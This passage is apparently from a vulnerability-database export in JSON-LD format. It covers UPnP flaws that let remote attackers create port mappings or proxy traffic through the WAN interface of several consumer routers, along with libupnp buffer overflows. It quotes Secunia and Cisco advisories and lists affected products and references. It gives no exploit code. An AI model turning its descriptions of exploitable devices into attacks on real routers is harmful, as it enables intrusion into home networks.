4.30.5\nCisco Linksys WRT54GS v1 through v3 firmware versions prior to 4.71.1\nCisco Linksys WRT54GS v4 firmware versions prior to 1.06.1\nCisco Linksys WRT54GX firmware 2.00.05\nEdimax BR-6104K prior to 3.25\nEdimax 6114Wg\nCanyon-Tech CN-WF512 firmware version 1.83\nCanyon-Tech CN-WF514 firmware version 2.08\nSitecom WL-153 prior to firmware 1.39\nSitecom WL-111\nSweex LB000021 firmware version 3.15\nZyXEL P-330W\nSpeedTouch 5x6 firmware versions prior to 6.2.29\nThomson TG585 firmware versions prior to 7.4.3.2. ZyXEL P-330W is a wireless broadband router. A vulnerability exists in the UPnP IGD installation enablement of the ZyXEL P-330W\u0027s Pseudo ICS UPnP software. This vulnerability is related to the \\\"external forwarding\\\" vulnerability. 
----------------------------------------------------------------------\n\nThe final version of the CSI 6.0 has been released. \nFind out why this is not just another Patch Management solution: http://secunia.com/blog/325/\n\n----------------------------------------------------------------------\n\nTITLE:\nSiemens OZW / OZS Multiple Products libupnp Buffer Overflow\nVulnerabilities\n\nSECUNIA ADVISORY ID:\nSA52035\n\nVERIFY ADVISORY:\nSecunia.com\nhttp://secunia.com/advisories/52035/\nCustomer Area (Credentials Required)\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=52035\n\nRELEASE DATE:\n2013-01-31\n\nDISCUSS ADVISORY:\nhttp://secunia.com/advisories/52035/#comments\n\nAVAILABLE ON SITE AND IN CUSTOMER AREA:\n * Last Update\n * Popularity\n * Comments\n * Criticality Level\n * Impact\n * Where\n * Solution Status\n * Operating System / Software\n * CVE Reference(s)\n\nhttp://secunia.com/advisories/52035/\n\nONLY AVAILABLE IN CUSTOMER AREA:\n * Authentication Level\n * Report Reliability\n * Secunia PoC\n * Secunia Analysis\n * Systems Affected\n * Approve Distribution\n * Remediation Status\n * Secunia CVSS Score\n * CVSS\n\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=52035\n\nONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:\n * AUTOMATED SCANNING\n\nhttp://secunia.com/vulnerability_scanning/personal/\nhttp://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/\n\nDESCRIPTION:\nMultiple vulnerabilities have been reported in multiple Siemens OZW\nand OZS products, which can be exploited by malicious people to\ncompromise a vulnerable device. \n\n1) Multiple vulnerabilities are caused due to a bundled version of\nlibupnp. \n\nFor more information:\nSA51949\n\n2) Multiple boundary errors within the \"unique_service_name()\"\nfunction (ssdp/ssdp_ctrlpt.c) in libupnp when handling SSDP requests\ncan be exploited to cause stack-based buffer overflows. The vendor is planning\nto provide fixes with upcoming firmware updates. 
\n\nPROVIDED AND/OR DISCOVERED BY:\n2) Rapid7\n\nORIGINAL ADVISORY:\nSiemens SSA-963338:\nhttp://www.siemens.com/corporate-technology/pool/de/forschungsfelder/siemens_security_advisory_ssa-963338.pdf\n\nRapid7:\nhttps://community.rapid7.com/docs/DOC-2150\nhttps://community.rapid7.com/community/infosec/blog/2013/01/29/security-flaws-in-universal-plug-and-play-unplug-dont-play\n\nOTHER REFERENCES:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nDEEP LINKS:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXTENDED DESCRIPTION:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXTENDED SOLUTION:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXPLOIT:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\nprivate users keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/advisories/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/advisories/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n. 
This library is used in several vendor network\ndevices in addition to media streaming and file sharing applications. \nThese vulnerabilities were disclosed on January 29th, 2013 in a CERT\nVulnerability Note, VU#922681, which can be viewed at:\n\nhttp://www.kb.cert.org/vuls/id/922681\n\nCisco is currently evaluating products for possible exposure to these\nvulnerabilities. This advisory is available at the following link:\n\nhttp://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20130129-upnp\n\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.11 (GNU/Linux)\n\niF4EAREIAAYFAlEIJZ8ACgkQUddfH3/BbTrUagD9FnKSVkc2iIfGs+7c8SVPT26+\nga5hYEz9UMUnitcqnbcBAIKe6KnkR6he2zbstVtbTKtqSjE7pfVb3lTKVZSeAkM5\n=6sTu\n-----END PGP SIGNATURE-----\n\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2011-4504"
},
{
"db": "CERT/CC",
"id": "VU#357851"
},
{
"db": "CERT/CC",
"id": "VU#922681"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003034"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-002341"
},
{
"db": "CNVD",
"id": "CNVD-2011-5060"
},
{
"db": "BID",
"id": "50810"
},
{
"db": "VULHUB",
"id": "VHN-52449"
},
{
"db": "PACKETSTORM",
"id": "119949"
},
{
"db": "PACKETSTORM",
"id": "119896"
}
],
"trust": 4.86
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "CERT/CC",
"id": "VU#357851",
"trust": 5.8
},
{
"db": "NVD",
"id": "CVE-2011-4504",
"trust": 3.4
},
{
"db": "SIEMENS",
"id": "SSA-963338",
"trust": 0.9
},
{
"db": "CERT/CC",
"id": "VU#922681",
"trust": 0.9
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003034",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2011-002341",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201111-366",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2011-5060",
"trust": 0.6
},
{
"db": "NSFOCUS",
"id": "18224",
"trust": 0.6
},
{
"db": "BID",
"id": "50810",
"trust": 0.3
},
{
"db": "SECUNIA",
"id": "52035",
"trust": 0.2
},
{
"db": "VULHUB",
"id": "VHN-52449",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "119949",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "119896",
"trust": 0.1
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#357851"
},
{
"db": "CERT/CC",
"id": "VU#922681"
},
{
"db": "CNVD",
"id": "CNVD-2011-5060"
},
{
"db": "VULHUB",
"id": "VHN-52449"
},
{
"db": "BID",
"id": "50810"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003034"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-002341"
},
{
"db": "PACKETSTORM",
"id": "119949"
},
{
"db": "PACKETSTORM",
"id": "119896"
},
{
"db": "NVD",
"id": "CVE-2011-4504"
},
{
"db": "CNNVD",
"id": "CNNVD-201111-366"
}
]
},
"id": "VAR-201111-0160",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2011-5060"
},
{
"db": "VULHUB",
"id": "VHN-52449"
}
],
"trust": 1.4788191
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2011-5060"
}
]
},
"last_update_date": "2023-12-18T12:09:30.333000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "http://www.zyxel.com/"
},
{
"title": "Patch for Multiple Routers UPnP WAN Interface Remote Unauthorized Access Vulnerability (CNVD-2011-5060)",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/6020"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2011-5060"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003034"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-16",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-52449"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003034"
},
{
"db": "NVD",
"id": "CVE-2011-4504"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 4.4,
"url": "http://www.kb.cert.org/vuls/id/357851"
},
{
"trust": 1.7,
"url": "http://www.upnp-hacks.org/suspect.html"
},
{
"trust": 1.6,
"url": "http://homekb.cisco.com/cisco2/ukp.aspx?vw=1\u0026articleid=28341"
},
{
"trust": 1.1,
"url": "http://www.upnp-hacks.org/devices.html"
},
{
"trust": 0.9,
"url": "https://community.rapid7.com/community/infosec/blog/2013/01/29/security-flaws-in-universal-plug-and-play-unplug-dont-play"
},
{
"trust": 0.9,
"url": "https://community.rapid7.com/docs/doc-2150"
},
{
"trust": 0.9,
"url": "http://www.siemens.com/corporate-technology/pool/de/forschungsfelder/siemens_security_advisory_ssa-963338.pdf"
},
{
"trust": 0.8,
"url": "http://toor.do/upnp.html"
},
{
"trust": 0.8,
"url": "http://www.h-online.com/security/news/item/upnp-enabled-routers-allow-attacks-on-lans-1329727.html"
},
{
"trust": 0.8,
"url": "http://toor.do/defcon-19-garcia-upnp-mapping-wp.pdf"
},
{
"trust": 0.8,
"url": "http://pupnp.sourceforge.net/"
},
{
"trust": 0.8,
"url": "https://community.rapid7.com/servlet/jiveservlet/download/2150-1-16596/securityflawsupnp.pdf"
},
{
"trust": 0.8,
"url": "http://www.rapid7.com/resources/free-security-software-downloads/universal-plug-and-play-jan-2013.jsp"
},
{
"trust": 0.8,
"url": "http://opentools.homeip.net/dev-tools-for-upnp"
},
{
"trust": 0.8,
"url": "http://upnp.sourceforge.net/"
},
{
"trust": 0.8,
"url": "http://www.dlink.com/us/en/technology/upnp"
},
{
"trust": 0.8,
"url": "http://jpn.nec.com/security-info/secinfo/nv13-003.html"
},
{
"trust": 0.8,
"url": "http://www.ipitomy.com/index.php/mi-security-notice-ip001"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-4504"
},
{
"trust": 0.8,
"url": "http://jvn.jp/cert/jvnvu357851/"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2011-4504"
},
{
"trust": 0.8,
"url": "http://jvn.jp/cert/jvnvu357851"
},
{
"trust": 0.6,
"url": "http://www.kb.cert.org/vuls/id/357851http"
},
{
"trust": 0.6,
"url": "http://www.nsfocus.net/vulndb/18224"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/52035/#comments"
},
{
"trust": 0.1,
"url": "http://secunia.com/vulnerability_intelligence/"
},
{
"trust": 0.1,
"url": "http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/secunia_security_advisories/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/about_secunia_advisories/"
},
{
"trust": 0.1,
"url": "https://ca.secunia.com/?page=viewadvisory\u0026vuln_id=52035"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/52035/"
},
{
"trust": 0.1,
"url": "http://secunia.com/vulnerability_scanning/personal/"
},
{
"trust": 0.1,
"url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
},
{
"trust": 0.1,
"url": "http://secunia.com/blog/325/"
},
{
"trust": 0.1,
"url": "http://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20130129-upnp"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/922681"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#357851"
},
{
"db": "CERT/CC",
"id": "VU#922681"
},
{
"db": "CNVD",
"id": "CNVD-2011-5060"
},
{
"db": "VULHUB",
"id": "VHN-52449"
},
{
"db": "BID",
"id": "50810"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003034"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-002341"
},
{
"db": "PACKETSTORM",
"id": "119949"
},
{
"db": "PACKETSTORM",
"id": "119896"
},
{
"db": "NVD",
"id": "CVE-2011-4504"
},
{
"db": "CNNVD",
"id": "CNNVD-201111-366"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CERT/CC",
"id": "VU#357851"
},
{
"db": "CERT/CC",
"id": "VU#922681"
},
{
"db": "CNVD",
"id": "CNVD-2011-5060"
},
{
"db": "VULHUB",
"id": "VHN-52449"
},
{
"db": "BID",
"id": "50810"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003034"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-002341"
},
{
"db": "PACKETSTORM",
"id": "119949"
},
{
"db": "PACKETSTORM",
"id": "119896"
},
{
"db": "NVD",
"id": "CVE-2011-4504"
},
{
"db": "CNNVD",
"id": "CNNVD-201111-366"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2011-10-05T00:00:00",
"db": "CERT/CC",
"id": "VU#357851"
},
{
"date": "2013-01-29T00:00:00",
"db": "CERT/CC",
"id": "VU#922681"
},
{
"date": "2011-11-25T00:00:00",
"db": "CNVD",
"id": "CNVD-2011-5060"
},
{
"date": "2011-11-22T00:00:00",
"db": "VULHUB",
"id": "VHN-52449"
},
{
"date": "2011-11-24T00:00:00",
"db": "BID",
"id": "50810"
},
{
"date": "2011-11-25T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2011-003034"
},
{
"date": "2011-10-12T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2011-002341"
},
{
"date": "2013-01-31T07:26:31",
"db": "PACKETSTORM",
"id": "119949"
},
{
"date": "2013-01-30T02:46:44",
"db": "PACKETSTORM",
"id": "119896"
},
{
"date": "2011-11-22T11:55:06.013000",
"db": "NVD",
"id": "CVE-2011-4504"
},
{
"date": "2011-11-25T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201111-366"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2012-11-30T00:00:00",
"db": "CERT/CC",
"id": "VU#357851"
},
{
"date": "2014-07-30T00:00:00",
"db": "CERT/CC",
"id": "VU#922681"
},
{
"date": "2011-11-25T00:00:00",
"db": "CNVD",
"id": "CNVD-2011-5060"
},
{
"date": "2012-03-08T00:00:00",
"db": "VULHUB",
"id": "VHN-52449"
},
{
"date": "2015-03-19T08:33:00",
"db": "BID",
"id": "50810"
},
{
"date": "2011-11-25T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2011-003034"
},
{
"date": "2011-10-12T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2011-002341"
},
{
"date": "2012-03-08T05:00:00",
"db": "NVD",
"id": "CVE-2011-4504"
},
{
"date": "2011-11-25T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201111-366"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201111-366"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "UPnP requests accepted over router WAN interfaces",
"sources": [
{
"db": "CERT/CC",
"id": "VU#357851"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "configuration error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201111-366"
}
],
"trust": 0.6
}
}
VAR-201111-0162
Vulnerability from variot - Updated: 2023-12-18 12:09
The UPnP IGD implementation on the Thomson (aka Technicolor) TG585 with firmware 7.x before 7.4.3.2 allows remote attackers to establish arbitrary port mappings by sending a UPnP AddPortMapping action in a SOAP request to the WAN interface, related to an "external forwarding" vulnerability. The Portable SDK for UPnP Devices libupnp library contains multiple buffer overflow vulnerabilities. Devices that use libupnp may also accept UPnP queries over the WAN interface, therefore exposing the vulnerabilities to the internet. Multiple Universal Plug and Play (UPnP)-compatible routers have insufficient access restrictions: a UPnP-capable router may accept unintended UPnP requests arriving on its WAN-side interface. An unauthenticated remote third party could obtain local network information or use the product as a proxy. Universal Plug and Play (UPnP) is a network protocol that is mostly used for personal computer device discovery and communication with other devices and the Internet. These requests can be used to connect to internal hosts behind the NAT firewall or to proxy connections through it. Remote unauthenticated attackers can exploit the vulnerabilities to scan internal hosts or to proxy Internet traffic through the device. The following devices are affected: Cisco Linksys WRT54G firmware version prior to 4.30.5; Cisco Linksys WRT54GS v1 through v3 firmware versions prior to 4.71.1; Cisco Linksys WRT54GS v4 firmware versions prior to 1.06.1; Cisco Linksys WRT54GX firmware 2.00.05; Edimax BR-6104K prior to 3.25; Edimax 6114Wg; Canyon-Tech CN-WF512 firmware version 1.83; Canyon-Tech CN-WF514 firmware version 2.08; Sitecom WL-153 prior to firmware 1.39; Sitecom WL-111; Sweex LB000021 firmware version 3.15; ZyXEL P-330W; SpeedTouch 5x6 firmware versions prior to 6.2.29; Thomson TG585 firmware versions prior to 7.4.3.2.
A vulnerability exists in the UPnP IGD implementation on the Thomson (also known as Technicolor) TG585 with firmware 7.x prior to firmware 7.4.3.2. This vulnerability is related to the "external forwarding" vulnerability.
----------------------------------------------------------------------
TITLE: Siemens OZW / OZS Multiple Products libupnp Buffer Overflow Vulnerabilities
SECUNIA ADVISORY ID: SA52035
VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/52035/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=52035
RELEASE DATE: 2013-01-31
DISCUSS ADVISORY: http://secunia.com/advisories/52035/#comments
DESCRIPTION: Multiple vulnerabilities have been reported in multiple Siemens OZW and OZS products, which can be exploited by malicious people to compromise a vulnerable device.
1) Multiple vulnerabilities are caused due to a bundled version of libupnp.
For more information: SA51949
2) Multiple boundary errors within the "unique_service_name()" function (ssdp/ssdp_ctrlpt.c) in libupnp when handling SSDP requests can be exploited to cause stack-based buffer overflows. The vendor is planning to provide fixes with upcoming firmware updates.
PROVIDED AND/OR DISCOVERED BY: 2) Rapid7
ORIGINAL ADVISORY: Siemens SSA-963338: http://www.siemens.com/corporate-technology/pool/de/forschungsfelder/siemens_security_advisory_ssa-963338.pdf
Rapid7: https://community.rapid7.com/docs/DOC-2150 https://community.rapid7.com/community/infosec/blog/2013/01/29/security-flaws-in-universal-plug-and-play-unplug-dont-play
. This library is used in several vendor network devices in addition to media streaming and file sharing applications. These vulnerabilities were disclosed on January 29th, 2013 in a CERT Vulnerability Note, VU#922681, which can be viewed at:
http://www.kb.cert.org/vuls/id/922681
Cisco is currently evaluating products for possible exposure to these vulnerabilities. This advisory is available at the following link:
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20130129-upnp
-----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.11 (GNU/Linux)
iF4EAREIAAYFAlEIJZ8ACgkQUddfH3/BbTrUagD9FnKSVkc2iIfGs+7c8SVPT26+ ga5hYEz9UMUnitcqnbcBAIKe6KnkR6he2zbstVtbTKtqSjE7pfVb3lTKVZSeAkM5 =6sTu -----END PGP SIGNATURE-----
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201111-0162",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "tg585 router",
"scope": "lte",
"trust": 1.0,
"vendor": "technicolor",
"version": "7.4"
},
{
"model": "tg585 router",
"scope": "eq",
"trust": 1.0,
"vendor": "technicolor",
"version": "*"
},
{
"model": "br-6104k",
"scope": "eq",
"trust": 0.9,
"vendor": "edimax",
"version": "0"
},
{
"model": "6114wg",
"scope": "eq",
"trust": 0.9,
"vendor": "edimax",
"version": "0"
},
{
"model": "cn-wf514",
"scope": "eq",
"trust": 0.9,
"vendor": "canyon tech",
"version": "2.08"
},
{
"model": "cn-wf512",
"scope": "eq",
"trust": 0.9,
"vendor": "canyon tech",
"version": "1.83"
},
{
"model": "p-330w",
"scope": "eq",
"trust": 0.9,
"vendor": "zyxel",
"version": "0"
},
{
"model": "tg585 router",
"scope": "eq",
"trust": 0.9,
"vendor": "thomson",
"version": "0"
},
{
"model": null,
"scope": "eq",
"trust": 0.9,
"vendor": "speedtouch",
"version": "5x60"
},
{
"model": "wl-153",
"scope": "eq",
"trust": 0.9,
"vendor": "sitcom",
"version": "0"
},
{
"model": "wl-111",
"scope": "eq",
"trust": 0.9,
"vendor": "sitcom",
"version": "0"
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "canyon tech",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "edimax computer",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "linksys a division of cisco",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "sitecom",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "sweex",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "technicolor",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "zyxel",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "axis",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "cisco",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "fujitsu",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "huawei",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "linksys",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "nec",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "siemens",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "sony",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "synology",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "ipitomy",
"version": null
},
{
"model": "",
"scope": null,
"trust": 0.8,
"vendor": "multiple vendors",
"version": null
},
{
"model": "tg585",
"scope": "lt",
"trust": 0.8,
"vendor": "technicolor",
"version": "7.x"
},
{
"model": "tg585",
"scope": null,
"trust": 0.8,
"vendor": "technicolor",
"version": null
},
{
"model": "tg585",
"scope": "eq",
"trust": 0.8,
"vendor": "technicolor",
"version": "7.4.3.2"
},
{
"model": "wrt54g beta/2.0",
"scope": "eq",
"trust": 0.6,
"vendor": "linksys",
"version": "4.04.20.6/4.04.0.7/3.03.3.6/3.03.1.3/2.02.4.4/2.02.02.82.00.8"
},
{
"model": "tg585 router",
"scope": "eq",
"trust": 0.6,
"vendor": "technicolor",
"version": "7.4"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v4.04.20.6"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v4.04.0.7"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v3.03.3.6"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v3.03.1.3"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v2.02.4.4"
},
{
"model": "wrt54g beta",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v2.02.02.8"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v2.02.00.8"
},
{
"model": "tg585 router",
"scope": "ne",
"trust": 0.3,
"vendor": "thomson",
"version": "7.4.3.2"
},
{
"model": null,
"scope": "ne",
"trust": 0.3,
"vendor": "speedtouch",
"version": "5x66.2.29"
},
{
"model": "wl-153",
"scope": "ne",
"trust": 0.3,
"vendor": "sitcom",
"version": "1.39"
},
{
"model": "wrt54g",
"scope": "ne",
"trust": 0.3,
"vendor": "linksys",
"version": "v4.01.0.6"
},
{
"model": "br-6104k",
"scope": "ne",
"trust": 0.3,
"vendor": "edimax",
"version": "3.25"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#357851"
},
{
"db": "CERT/CC",
"id": "VU#922681"
},
{
"db": "CNVD",
"id": "CNVD-2011-5064"
},
{
"db": "BID",
"id": "50810"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-002341"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003036"
},
{
"db": "NVD",
"id": "CVE-2011-4506"
},
{
"db": "CNNVD",
"id": "CNNVD-201111-368"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:technicolor:tg585_router_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "7.4",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:technicolor:tg585_router:*:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2011-4506"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Daniel Garcia",
"sources": [
{
"db": "BID",
"id": "50810"
}
],
"trust": 0.3
},
"cve": "CVE-2011-4506",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
